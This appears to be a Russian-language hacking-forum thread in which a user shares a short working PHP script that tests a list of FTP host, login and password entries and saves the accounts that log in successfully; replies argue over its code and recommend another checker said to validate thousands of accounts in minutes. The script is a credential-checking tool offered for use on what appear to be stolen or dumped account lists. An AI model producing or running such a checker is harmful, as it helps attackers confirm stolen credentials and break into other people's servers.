Тут щас чистил комп и нарвался на скрипт. Проверяет на валидность FTP. Открывает файл в котором есть записи типа: ftp.sait.ru login password, проверяет, потом открывает другой файли записывает туда рабочие аккаунты. Авось кому и пригодится. PHP: <? $ftp=file('valuehost.txt');$i=0;$fp=fopen('valid.txt','a+');foreach($ftp as $v){$v=preg_split('/[ ]+/',$v);$v[2]=str_replace("\r",'',str_replace("\n",'',$v[2]));$f=@ftp_connect($v[0],21,2);echo $i."\n";$i++;if($f){$lr=@ftp_login($f,$v[1],$v[2]);if($lr){echo implode(':',$v)."\n"; fwrite($fp,implode(':',$v)."\n");}} } ?>
Ой как славненько то =)))) 2 Dr.Check Коль выложил какашку, отвечай за нее. Объясни: - зачем открывать valid.txt для чтения? - если ты используешь счетчик в цикле, при чем тут foreach() ??? - чем preg_split шустрее комбинации list()=explode();? И с каких это пор в пароле не могут присутствовать пробелы? - чем это ftp_connect шустрее fsockopen - и наконец нафига там implode, если ты наперед знаешь какие ключи массива ты будешь писать в файл? 2 Digimortal 200 строк кода для брута ftp по файлу с реквизитами доступа... убейте меня ап стенку. =))))
Во-первых, я даже не помню мой ли это скрипт. Так как и сам я таких мелочей поно писал, брал откуда-то. Дата создания очень старая(май этого года) А наплевать, отвечу или за себя или за автора этого скрипта. . Какая разница. Можно и просто так PHP: fopen('valid.txt','a'); Ты сам то php Знаешь? Вообще то файл valuehost.txt Имеет вид ftp.madckdm.ru login pass ftp.sait.ru login pass и т.д, хочу посмотреть как ты по другому это реализуешь... Ну ты даёшь... причём тут пробелы в паролях? это пробелы между именем ftp сервера, логина и пароля, причём сколько угодно. на оставльное отвечать даже и не собираюсь. Так-что свернись в трэй
убить тебя "ап стенку" неполучится, т.к. ты в трей свернулся... =)) согласен размер не зашибись, просто кому то всегда пригодится. а скрипт этот <12кб, что не так уж и страшно...
cl_ftp_checker.php.txt от ciber lord дубаю самое удобное, просто ввести список фтп акк и ждать пару минут, 2300 проверяет на 1.5мб канале за 5-7 мин